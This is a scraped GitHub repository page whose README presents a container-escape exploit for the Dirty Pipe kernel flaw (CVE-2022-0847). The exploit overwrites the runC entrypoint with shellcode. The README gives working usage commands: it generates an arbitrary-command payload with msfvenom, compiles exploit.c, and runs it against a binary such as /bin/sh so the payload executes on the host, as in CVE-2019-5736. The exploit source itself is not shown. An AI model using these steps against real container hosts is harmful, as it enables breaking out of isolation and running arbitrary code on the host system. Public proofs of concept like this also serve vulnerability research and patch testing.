Skip to content

JlSakuya/CVE-2022-0847-container-escape

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits
 
 
 
 

Repository files navigation

CVE-2022-0847

A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.

Usage

Produce base64 encoded shellcode using msf:

$ msfvenom -p linux/x64/exec CMD="<command>" -f base64

Compile and run in the container, the overwritten filename is the bin that runC will execute in the container (such as /bin/sh):

$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>

Trigger exploit and shellcode outside the container like CVE-2019-5736.

References

About

A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages